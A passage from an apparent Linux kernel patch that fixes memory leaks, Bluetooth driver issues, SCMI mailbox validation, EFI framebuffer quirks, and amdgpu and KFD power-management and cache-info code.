+index 681cb3786794d..49cb4537344aa 100644
+--- a/drivers/atm/idt77252.c
++++ b/drivers/atm/idt77252.c
+@@ -2909,6 +2909,7 @@ close_card_oam(struct idt77252_dev *card)
+ 
+ 				recycle_rx_pool_skb(card, &vc->rcv.rx_pool);
+ 			}
++			kfree(vc);
+ 		}
+ 	}
+ }
+@@ -2952,6 +2953,15 @@ open_card_ubr0(struct idt77252_dev *card)
+ 	return 0;
+ }
+ 
++static void
++close_card_ubr0(struct idt77252_dev *card)
++{
++	struct vc_map *vc = card->vcs[0];
++
++	free_scq(card, vc->scq);
++	kfree(vc);
++}
++
+ static int
+ idt77252_dev_open(struct idt77252_dev *card)
+ {
+@@ -3001,6 +3011,7 @@ static void idt77252_dev_close(struct atm_dev *dev)
+ 	struct idt77252_dev *card = dev->dev_data;
+ 	u32 conf;
+ 
++	close_card_ubr0(card);
+ 	close_card_oam(card);
+ 
+ 	conf = SAR_CFG_RXPTH |	/* enable receive path           */
+diff --git a/drivers/bluetooth/btqcomsmd.c b/drivers/bluetooth/btqcomsmd.c
+index 2acb719e596f5..11c7e04bf3947 100644
+--- a/drivers/bluetooth/btqcomsmd.c
++++ b/drivers/bluetooth/btqcomsmd.c
+@@ -122,6 +122,21 @@ static int btqcomsmd_setup(struct hci_dev *hdev)
+ 	return 0;
+ }
+ 
++static int btqcomsmd_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr)
++{
++	int ret;
++
++	ret = qca_set_bdaddr_rome(hdev, bdaddr);
++	if (ret)
++		return ret;
++
++	/* The firmware stops responding for a while after setting the bdaddr,
++	 * causing timeouts for subsequent commands. Sleep a bit to avoid this.
++	 */
++	usleep_range(1000, 10000);
++	return 0;
++}
++
+ static int btqcomsmd_probe(struct platform_device *pdev)
+ {
+ 	struct btqcomsmd *btq;
+@@ -162,7 +177,7 @@ static int btqcomsmd_probe(struct platform_device *pdev)
+ 	hdev->close = btqcomsmd_close;
+ 	hdev->send = btqcomsmd_send;
+ 	hdev->setup = btqcomsmd_setup;
+-	hdev->set_bdaddr = qca_set_bdaddr_rome;
++	hdev->set_bdaddr = btqcomsmd_set_bdaddr;
+ 
+ 	ret = hci_register_dev(hdev);
+ 	if (ret < 0)
+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 795be33f2892d..02893600db390 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -354,6 +354,7 @@ static void btsdio_remove(struct sdio_func *func)
+ 
+ 	BT_DBG("func %p", func);
+ 
++	cancel_work_sync(&data->work);
+ 	if (!data)
+ 		return;
+ 
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 952dc9d2404ed..90b85dcb138df 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -1020,21 +1020,11 @@ static int btusb_recv_bulk(struct btusb_data *data, void *buffer, int count)
+ 		hci_skb_expect(skb) -= len;
+ 
+ 		if (skb->len == HCI_ACL_HDR_SIZE) {
+-			__u16 handle = __le16_to_cpu(hci_acl_hdr(skb)->handle);
+ 			__le16 dlen = hci_acl_hdr(skb)->dlen;
+-			__u8 type;
+ 
+ 			/* Complete ACL header */
+ 			hci_skb_expect(skb) = __le16_to_cpu(dlen);
+ 
+-			/* Detect if ISO packet has been sent over bulk */
+-			if (hci_conn_num(data->hdev, ISO_LINK)) {
+-				type = hci_conn_lookup_type(data->hdev,
+-							    hci_handle(handle));
+-				if (type == ISO_LINK)
+-					hci_skb_pkt_type(skb) = HCI_ISODATA_PKT;
+-			}
+-
+ 			if (skb_tailroom(skb) < hci_skb_expect(skb)) {
+ 				kfree_skb(skb);
+ 				skb = NULL;
+diff --git a/drivers/bus/imx-weim.c b/drivers/bus/imx-weim.c
+index 828c66bbaa676..55d917bd1f3f8 100644
+--- a/drivers/bus/imx-weim.c
++++ b/drivers/bus/imx-weim.c
+@@ -204,8 +204,8 @@ static int weim_parse_dt(struct platform_device *pdev)
+ 	const struct of_device_id *of_id = of_match_device(weim_id_table,
+ 							   &pdev->dev);
+ 	const struct imx_weim_devtype *devtype = of_id->data;
++	int ret = 0, have_child = 0;
+ 	struct device_node *child;
+-	int ret, have_child = 0;
+ 	struct weim_priv *priv;
+ 	void __iomem *base;
+ 	u32 reg;
+diff --git a/drivers/firmware/arm_scmi/mailbox.c b/drivers/firmware/arm_scmi/mailbox.c
+index 1e40cb035044d..a455f3c0e98b2 100644
+--- a/drivers/firmware/arm_scmi/mailbox.c
++++ b/drivers/firmware/arm_scmi/mailbox.c
+@@ -52,6 +52,39 @@ static bool mailbox_chan_available(struct device *dev, int idx)
+ 					   "#mbox-cells", idx, NULL);
+ }
+ 
++static int mailbox_chan_validate(struct device *cdev)
++{
++	int num_mb, num_sh, ret = 0;
++	struct device_node *np = cdev->of_node;
++
++	num_mb = of_count_phandle_with_args(np, "mboxes", "#mbox-cells");
++	num_sh = of_count_phandle_with_args(np, "shmem", NULL);
++	/* Bail out if mboxes and shmem descriptors are inconsistent */
++	if (num_mb <= 0 || num_sh > 2 || num_mb != num_sh) {
++		dev_warn(cdev, "Invalid channel descriptor for '%s'\n",
++			 of_node_full_name(np));
++		return -EINVAL;
++	}
++
++	if (num_sh > 1) {
++		struct device_node *np_tx, *np_rx;
++
++		np_tx = of_parse_phandle(np, "shmem", 0);
++		np_rx = of_parse_phandle(np, "shmem", 1);
++		/* SCMI Tx and Rx shared mem areas have to be distinct */
++		if (!np_tx || !np_rx || np_tx == np_rx) {
++			dev_warn(cdev, "Invalid shmem descriptor for '%s'\n",
++				 of_node_full_name(np));
++			ret = -EINVAL;
++		}
++
++		of_node_put(np_tx);
++		of_node_put(np_rx);
++	}
++
++	return ret;
++}
++
+ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 			      bool tx)
+ {
+@@ -64,6 +97,10 @@ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 	resource_size_t size;
+ 	struct resource res;
+ 
++	ret = mailbox_chan_validate(cdev);
++	if (ret)
++		return ret;
++
+ 	smbox = devm_kzalloc(dev, sizeof(*smbox), GFP_KERNEL);
+ 	if (!smbox)
+ 		return -ENOMEM;
+diff --git a/drivers/firmware/efi/libstub/smbios.c b/drivers/firmware/efi/libstub/smbios.c
+index 460418b7f5f5e..aadb422b9637d 100644
+--- a/drivers/firmware/efi/libstub/smbios.c
++++ b/drivers/firmware/efi/libstub/smbios.c
+@@ -36,7 +36,7 @@ const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize)
+ 	if (status != EFI_SUCCESS)
+ 		return NULL;
+ 
+-	strtable = (u8 *)record + recsize;
++	strtable = (u8 *)record + record->length;
+ 	for (int i = 1; i < ((u8 *)record)[offset]; i++) {
+ 		int len = strlen(strtable);
+ 
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index f06fdacc9bc83..e76d6803bdd08 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -341,7 +341,7 @@ static const struct fwnode_operations efifb_fwnode_ops = {
+ #ifdef CONFIG_EFI
+ static struct fwnode_handle efifb_fwnode;
+ 
+-__init void sysfb_apply_efi_quirks(struct platform_device *pd)
++__init void sysfb_apply_efi_quirks(void)
+ {
+ 	if (screen_info.orig_video_isVGA != VIDEO_TYPE_EFI ||
+ 	    !(screen_info.capabilities & VIDEO_CAPABILITY_SKIP_QUIRKS))
+@@ -355,7 +355,10 @@ __init void sysfb_apply_efi_quirks(struct platform_device *pd)
+ 		screen_info.lfb_height = temp;
+ 		screen_info.lfb_linelength = 4 * screen_info.lfb_width;
+ 	}
++}
+ 
++__init void sysfb_set_efifb_fwnode(struct platform_device *pd)
++{
+ 	if (screen_info.orig_video_isVGA == VIDEO_TYPE_EFI && IS_ENABLED(CONFIG_PCI)) {
+ 		fwnode_init(&efifb_fwnode, &efifb_fwnode_ops);
+ 		pd->dev.fwnode = &efifb_fwnode;
+diff --git a/drivers/firmware/sysfb.c b/drivers/firmware/sysfb.c
+index 3fd3563d962b8..3c197db42c9d9 100644
+--- a/drivers/firmware/sysfb.c
++++ b/drivers/firmware/sysfb.c
+@@ -81,6 +81,8 @@ static __init int sysfb_init(void)
+ 	if (disabled)
+ 		goto unlock_mutex;
+ 
++	sysfb_apply_efi_quirks();
++
+ 	/* try to create a simple-framebuffer device */
+ 	compatible = sysfb_parse_mode(si, &mode);
+ 	if (compatible) {
+@@ -107,7 +109,7 @@ static __init int sysfb_init(void)
+ 		goto unlock_mutex;
+ 	}
+ 
+-	sysfb_apply_efi_quirks(pd);
++	sysfb_set_efifb_fwnode(pd);
+ 
+ 	ret = platform_device_add_data(pd, si, sizeof(*si));
+ 	if (ret)
+diff --git a/drivers/firmware/sysfb_simplefb.c b/drivers/firmware/sysfb_simplefb.c
+index a353e27f83f54..ca907f7e76c65 100644
+--- a/drivers/firmware/sysfb_simplefb.c
++++ b/drivers/firmware/sysfb_simplefb.c
+@@ -110,7 +110,7 @@ __init struct platform_device *sysfb_create_simplefb(const struct screen_info *s
+ 	if (!pd)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	sysfb_apply_efi_quirks(pd);
++	sysfb_set_efifb_fwnode(pd);
+ 
+ 	ret = platform_device_add_resources(pd, &res, 1);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index 5f1d0990c6f34..39c5e14b02529 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1263,6 +1263,7 @@ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
++bool amdgpu_device_aspm_support_quirk(void);
+ 
+ void amdgpu_cs_report_moved_bytes(struct amdgpu_device *adev, u64 num_bytes,
+ 				  u64 num_vis_bytes);
+@@ -1382,10 +1383,12 @@ int amdgpu_acpi_smart_shift_update(struct drm_device *dev, enum amdgpu_ss ss_sta
+ int amdgpu_acpi_pcie_notify_device_ready(struct amdgpu_device *adev);
+ 
+ void amdgpu_acpi_get_backlight_caps(struct amdgpu_dm_backlight_caps *caps);
++bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev);
+ void amdgpu_acpi_detect(void);
+ #else
+ static inline int amdgpu_acpi_init(struct amdgpu_device *adev) { return 0; }
+ static inline void amdgpu_acpi_fini(struct amdgpu_device *adev) { }
++static inline bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev) { return false; }
+ static inline void amdgpu_acpi_detect(void) { }
+ static inline bool amdgpu_acpi_is_power_shift_control_supported(void) { return false; }
+ static inline int amdgpu_acpi_power_shift_control(struct amdgpu_device *adev,
+@@ -1396,11 +1399,9 @@ static inline int amdgpu_acpi_smart_shift_update(struct drm_device *dev,
+ 
+ #if defined(CONFIG_ACPI) && defined(CONFIG_SUSPEND)
+ bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev);
+-bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev);
+ bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev);
+ #else
+ static inline bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev) { return false; }
+-static inline bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev) { return false; }
+ static inline bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev) { return false; }
+ #endif
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index b14800ac179ee..435d81d6ffd9b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -971,6 +971,29 @@ static bool amdgpu_atcs_pci_probe_handle(struct pci_dev *pdev)
+ 	return true;
+ }
+ 
++
++/**
++ * amdgpu_acpi_should_gpu_reset
++ *
++ * @adev: amdgpu_device_pointer
++ *
++ * returns true if should reset GPU, false if not
++ */
++bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
++{
++	if (adev->flags & AMD_IS_APU)
++		return false;
++
++	if (amdgpu_sriov_vf(adev))
++		return false;
++
++#if IS_ENABLED(CONFIG_SUSPEND)
++	return pm_suspend_target_state != PM_SUSPEND_TO_IDLE;
++#else
++	return true;
++#endif
++}
++
+ /*
+  * amdgpu_acpi_detect - detect ACPI ATIF/ATCS methods
+  *
+@@ -1042,24 +1065,6 @@ bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev)
+ 		(pm_suspend_target_state == PM_SUSPEND_MEM);
+ }
+ 
+-/**
+- * amdgpu_acpi_should_gpu_reset
+- *
+- * @adev: amdgpu_device_pointer
+- *
+- * returns true if should reset GPU, false if not
+- */
+-bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
+-{
+-	if (adev->flags & AMD_IS_APU)
+-		return false;
+-
+-	if (amdgpu_sriov_vf(adev))
+-		return false;
+-
+-	return pm_suspend_target_state != PM_SUSPEND_TO_IDLE;
+-}
+-
+ /**
+  * amdgpu_acpi_is_s0ix_active
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 824b0b356b3ce..9ef83f3ab3a7e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -78,6 +78,10 @@
+ 
+ #include <drm/drm_drv.h>
+ 
++#if IS_ENABLED(CONFIG_X86)
++#include <asm/intel-family.h>
++#endif
++
+ MODULE_FIRMWARE("amdgpu/vega10_gpu_info.bin");
+ MODULE_FIRMWARE("amdgpu/vega12_gpu_info.bin");
+ MODULE_FIRMWARE("amdgpu/raven_gpu_info.bin");
+@@ -1353,6 +1357,17 @@ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev)
+ 	return pcie_aspm_enabled(adev->pdev);
+ }
+ 
++bool amdgpu_device_aspm_support_quirk(void)
++{
++#if IS_ENABLED(CONFIG_X86)
++	struct cpuinfo_x86 *c = &cpu_data(0);
++
++	return !(c->x86 == 6 && c->x86_model == INTEL_FAM6_ALDERLAKE);
++#else
++	return true;
++#endif
++}
++
+ /* if we get transitioned to only one device, take VGA back */
+ /**
+  * amdgpu_device_vga_set_decode - enable/disable vga decode
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index dfbeef2c4a9e2..871f481f84328 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2447,7 +2447,10 @@ static int amdgpu_pmops_freeze(struct device *dev)
+ 	adev->in_s4 = false;
+ 	if (r)
+ 		return r;
+-	return amdgpu_asic_reset(adev);
++
++	if (amdgpu_acpi_should_gpu_reset(adev))
++		return amdgpu_asic_reset(adev);
++	return 0;
+ }
+ 
+ static int amdgpu_pmops_thaw(struct device *dev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index cfd78c4a45baa..4feedf518a191 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1312,7 +1312,7 @@ void amdgpu_bo_release_notify(struct ttm_buffer_object *bo)
+ 
+ 	if (!bo->resource || bo->resource->mem_type != TTM_PL_VRAM ||
+ 	    !(abo->flags & AMDGPU_GEM_CREATE_VRAM_WIPE_ON_RELEASE) ||
+-	    adev->in_suspend || adev->shutdown)
++	    adev->in_suspend || drm_dev_is_unplugged(adev_to_drm(adev)))
+ 		return;
+ 
+ 	if (WARN_ON_ONCE(!dma_resv_trylock(bo->base.resv)))
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+index 4b0d563c6522c..4ef1fa4603c8e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+@@ -382,11 +382,6 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		if (def != data)
+ 			WREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regBIF1_PCIE_MST_CTRL_3), data);
+ 		break;
+-	case IP_VERSION(7, 5, 1):
+-		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
+-		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
+-		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
+-		fallthrough;
+ 	default:
+ 		def = data = RREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regPCIE_CONFIG_CNTL));
+ 		data = REG_SET_FIELD(data, PCIE_CONFIG_CNTL,
+@@ -399,6 +394,15 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		break;
+ 	}
+ 
++	switch (adev->ip_versions[NBIO_HWIP][0]) {
++	case IP_VERSION(7, 3, 0):
++	case IP_VERSION(7, 5, 1):
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
++		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
++		break;
++	}
++
+ 	if (amdgpu_sriov_vf(adev))
+ 		adev->rmmio_remap.reg_offset = SOC15_REG_OFFSET(NBIO, 0,
+ 			regBIF_BX_PF0_HDP_MEM_COHERENCY_FLUSH_CNTL) << 2;
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index df3388e8dec00..877989278290a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -527,7 +527,7 @@ static void nv_pcie_gen3_enable(struct amdgpu_device *adev)
+ 
+ static void nv_program_aspm(struct amdgpu_device *adev)
+ {
+-	if (!amdgpu_device_should_use_aspm(adev))
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
+ 		return;
+ 
+ 	if (!(adev->flags & AMD_IS_APU) &&
+diff --git a/drivers/gpu/drm/amd/amdgpu/vi.c b/drivers/gpu/drm/amd/amdgpu/vi.c
+index f6ffd7c96ff98..d6c37c90c628c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vi.c
++++ b/drivers/gpu/drm/amd/amdgpu/vi.c
+@@ -81,10 +81,6 @@
+ #include "mxgpu_vi.h"
+ #include "amdgpu_dm.h"
+ 
+-#if IS_ENABLED(CONFIG_X86)
+-#include <asm/intel-family.h>
+-#endif
+-
+ #define ixPCIE_LC_L1_PM_SUBSTATE	0x100100C6
+ #define PCIE_LC_L1_PM_SUBSTATE__LC_L1_SUBSTATES_OVERRIDE_EN_MASK	0x00000001L
+ #define PCIE_LC_L1_PM_SUBSTATE__LC_PCI_PM_L1_2_OVERRIDE_MASK	0x00000002L
+@@ -1138,24 +1134,13 @@ static void vi_enable_aspm(struct amdgpu_device *adev)
+ 		WREG32_PCIE(ixPCIE_LC_CNTL, data);
+ }
+ 
+-static bool aspm_support_quirk_check(void)
+-{
+-#if IS_ENABLED(CONFIG_X86)
+-	struct cpuinfo_x86 *c = &cpu_data(0);
+-
+-	return !(c->x86 == 6 && c->x86_model == INTEL_FAM6_ALDERLAKE);
+-#else
+-	return true;
+-#endif
+-}
+-
+ static void vi_program_aspm(struct amdgpu_device *adev)
+ {
+ 	u32 data, data1, orig;
+ 	bool bL1SS = false;
+ 	bool bClkReqSupport = true;
+ 
+-	if (!amdgpu_device_should_use_aspm(adev) || !aspm_support_quirk_check())
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
+ 		return;
+ 
+ 	if (adev->flags & AMD_IS_APU ||
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_crat.c b/drivers/gpu/drm/amd/amdkfd/kfd_crat.c
+index 8bfdfd062ff64..e45c6bc8d10bb 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_crat.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_crat.c
+@@ -50,16 +50,6 @@ static inline unsigned int get_and_inc_gpu_processor_id(
+ 	return current_id;
+ }
+ 
+-/* Static table to describe GPU Cache information */
+-struct kfd_gpu_cache_info {
+-	uint32_t	cache_size;
+-	uint32_t	cache_level;
+-	uint32_t	flags;
+-	/* Indicates how many Compute Units share this cache
+-	 * within a SA. Value = 1 indicates the cache is not shared
+-	 */
+-	uint32_t	num_cu_shared;
+-};
+ 
+ static struct kfd_gpu_cache_info kaveri_cache_info[] = {
+ 	{
+@@ -891,6 +881,54 @@ static struct kfd_gpu_cache_info gc_10_3_6_cache_info[] = {
+ 	},
+ };
+ 
++static struct kfd_gpu_cache_info dummy_cache_info[] = {
++	{
++		/* TCP L1 Cache per CU */
++		.cache_size = 16,
++		.cache_level = 1,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_DATA_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 1,
++	},
++	{
++		/* Scalar L1 Instruction Cache per SQC */
++		.cache_size = 32,
++		.cache_level = 1,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_INST_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 2,
++	},
++	{
++		/* Scalar L1 Data Cache per SQC */
++		.cache_size = 16,
++		.cache_level = 1,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_DATA_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 2,
++	},
++	{
++		/* GL1 Data Cache per SA */
++		.cache_size = 128,
++		.cache_level = 1,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_DATA_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 6,
++	},
++	{
++		/* L2 Data Cache per GPU (Total Tex Cache) */
++		.cache_size = 2048,
++		.cache_level = 2,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_DATA_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 6,
++	},
++};
++
+ static void kfd_populated_cu_info_cpu(struct kfd_topology_device *dev,
+ 		struct crat_subtype_computeunit *cu)
+ {
+@@ -1071,8 +1109,12 @@ static int kfd_parse_subtype_cache(struct crat_subtype_cache *cache,
+ 			props->cachelines_per_tag = cache->lines_per_tag;
+ 			props->cache_assoc = cache->associativity;
+ 			props->cache_latency = cache->cache_latency;
++
+ 			memcpy(props->sibling_map, cache->sibling_map,
+-					sizeof(props->sibling_map));
++					CRAT_SIBLINGMAP_SIZE);
++
++			/* set the sibling_map_size as 32 for CRAT from ACPI */
++			props->sibling_map_size = CRAT_SIBLINGMAP_SIZE;
+ 
+ 			if (cache->flags & CRAT_CACHE_FLAGS_DATA_CACHE)
+ 				props->cache_type |= HSA_CACHE_TYPE_DATA;
+@@ -1291,125 +1333,6 @@ err:
+ 	return ret;
+ }
+ 
+-/* Helper function. See kfd_fill_gpu_cache_info for parameter description */
+-static int fill_in_l1_pcache(struct crat_subtype_cache *pcache,
+-				struct kfd_gpu_cache_info *pcache_info,
+-				struct kfd_cu_info *cu_info,
+-				int mem_available,
+-				int cu_bitmask,
+-				int cache_type, unsigned int cu_processor_id,
+-				int cu_block)
+-{
+-	unsigned int cu_sibling_map_mask;
+-	int first_active_cu;
+-
+-	/* First check if enough memory is available */
+-	if (sizeof(struct crat_subtype_cache) > mem_available)
+-		return -ENOMEM;
+-
+-	cu_sibling_map_mask = cu_bitmask;
+-	cu_sibling_map_mask >>= cu_block;
+-	cu_sibling_map_mask &=
+-		((1 << pcache_info[cache_type].num_cu_shared) - 1);
+-	first_active_cu = ffs(cu_sibling_map_mask);
+-
+-	/* CU could be inactive. In case of shared cache find the first active
+-	 * CU. and incase of non-shared cache check if the CU is inactive. If
+-	 * inactive active skip it
+-	 */
+-	if (first_active_cu) {
+-		memset(pcache, 0, sizeof(struct crat_subtype_cache));
+-		pcache->type = CRAT_SUBTYPE_CACHE_AFFINITY;
+-		pcache->length = sizeof(struct crat_subtype_cache);
+-		pcache->flags = pcache_info[cache_type].flags;
+-		pcache->processor_id_low = cu_processor_id
+-					 + (first_active_cu - 1);
+-		pcache->cache_level = pcache_info[cache_type].cache_level;
+-		pcache->cache_size = pcache_info[cache_type].cache_size;
+-
+-		/* Sibling map is w.r.t processor_id_low, so shift out
+-		 * inactive CU
+-		 */
+-		cu_sibling_map_mask =
+-			cu_sibling_map_mask >> (first_active_cu - 1);
+-
+-		pcache->sibling_map[0] = (uint8_t)(cu_sibling_map_mask & 0xFF);
+-		pcache->sibling_map[1] =
+-				(uint8_t)((cu_sibling_map_mask >> 8) & 0xFF);
+-		pcache->sibling_map[2] =
+-				(uint8_t)((cu_sibling_map_mask >> 16) & 0xFF);
+-		pcache->sibling_map[3] =
+-				(uint8_t)((cu_sibling_map_mask >> 24) & 0xFF);
+-		return 0;
+-	}
+-	return 1;
+-}
+-
+-/* Helper function. See kfd_fill_gpu_cache_info for parameter description */
+-static int fill_in_l2_l3_pcache(struct crat_subtype_cache *pcache,
+-				struct kfd_gpu_cache_info *pcache_info,
+-				struct kfd_cu_info *cu_info,
+-				int mem_available,
+-				int cache_type, unsigned int cu_processor_id)
+-{
+-	unsigned int cu_sibling_map_mask;
+-	int first_active_cu;
+-	int i, j, k;
+-
+-	/* First check if enough memory is available */
+-	if (sizeof(struct crat_subtype_cache) > mem_available)
+-		return -ENOMEM;
+-
+-	cu_sibling_map_mask = cu_info->cu_bitmap[0][0];
+-	cu_sibling_map_mask &=
+-		((1 << pcache_info[cache_type].num_cu_shared) - 1);
+-	first_active_cu = ffs(cu_sibling_map_mask);
+-
+-	/* CU could be inactive. In case of shared cache find the first active
+-	 * CU. and incase of non-shared cache check if the CU is inactive. If
+-	 * inactive active skip it
+-	 */
+-	if (first_active_cu) {
+-		memset(pcache, 0, sizeof(struct crat_subtype_cache));
+-		pcache->type = CRAT_SUBTYPE_CACHE_AFFINITY;
+-		pcache->length = sizeof(struct crat_subtype_cache);
+-		pcache->flags = pcache_info[cache_type].flags;
+-		pcache->processor_id_low = cu_processor_id
+-					 + (first_active_cu - 1);
+-		pcache->cache_level = pcache_info[cache_type].cache_level;
+-		pcache->cache_size = pcache_info[cache_type].cache_size;
+-
+-		/* Sibling map is w.r.t processor_id_low, so shift out
+-		 * inactive CU
+-		 */
+-		cu_sibling_map_mask =
+-			cu_sibling_map_mask >> (first_active_cu - 1);
+-		k = 0;
+-		for (i = 0; i < cu_info->num_shader_engines; i++) {
+-			for (j = 0; j < cu_info->num_shader_arrays_per_engine;
+-				j++) {
+-				pcache->sibling_map[k] =
+-				 (uint8_t)(cu_sibling_map_mask & 0xFF);
+-				pcache->sibling_map[k+1] =
+-				 (uint8_t)((cu_sibling_map_mask >> 8) & 0xFF);
+-				pcache->sibling_map[k+2] =
+-				 (uint8_t)((cu_sibling_map_mask >> 16) & 0xFF);
+-				pcache->sibling_map[k+3] =
+-				 (uint8_t)((cu_sibling_map_mask >> 24) & 0xFF);
+-				k += 4;
+-				cu_sibling_map_mask =
+-					cu_info->cu_bitmap[i % 4][j + i / 4];
+-				cu_sibling_map_mask &= (
+-				 (1 << pcache_info[cache_type].num_cu_shared)
+-				 - 1);
+-			}
+-		}
+-		return 0;
+-	}
+-	return 1;
+-}
+-
+-#define KFD_MAX_CACHE_TYPES 6
+ 
+ static int kfd_fill_gpu_cache_info_from_gfx_config(struct kfd_dev *kdev,
+ 						   struct kfd_gpu_cache_info *pcache_info)
+@@ -1483,228 +1406,134 @@ static int kfd_fill_gpu_cache_info_from_gfx_config(struct kfd_dev *kdev,
+ 	return i;
+ }
+ 
+-/* kfd_fill_gpu_cache_info - Fill GPU cache info using kfd_gpu_cache_info
+- * tables
+- *
+- *	@kdev - [IN] GPU device
+- *	@gpu_processor_id - [IN] GPU processor ID to which these caches
+- *			    associate
+- *	@available_size - [IN] Amount of memory available in pcache
+- *	@cu_info - [IN] Compute Unit info obtained from KGD
+- *	@pcache - [OUT] memory into which cache data is to be filled in.
+- *	@size_filled - [OUT] amount of data used up in pcache.
+- *	@num_of_entries - [OUT] number of caches added
+- */
+-static int kfd_fill_gpu_cache_info(struct kfd_dev *kdev,
+-			int gpu_processor_id,
+-			int available_size,
+-			struct kfd_cu_info *cu_info,
+-			struct crat_subtype_cache *pcache,
+-			int *size_filled,
+-			int *num_of_entries)
++int kfd_get_gpu_cache_info(struct kfd_dev *kdev, struct kfd_gpu_cache_info **pcache_info)
+ {
+-	struct kfd_gpu_cache_info *pcache_info;
+-	struct kfd_gpu_cache_info cache_info[KFD_MAX_CACHE_TYPES];
+ 	int num_of_cache_types = 0;
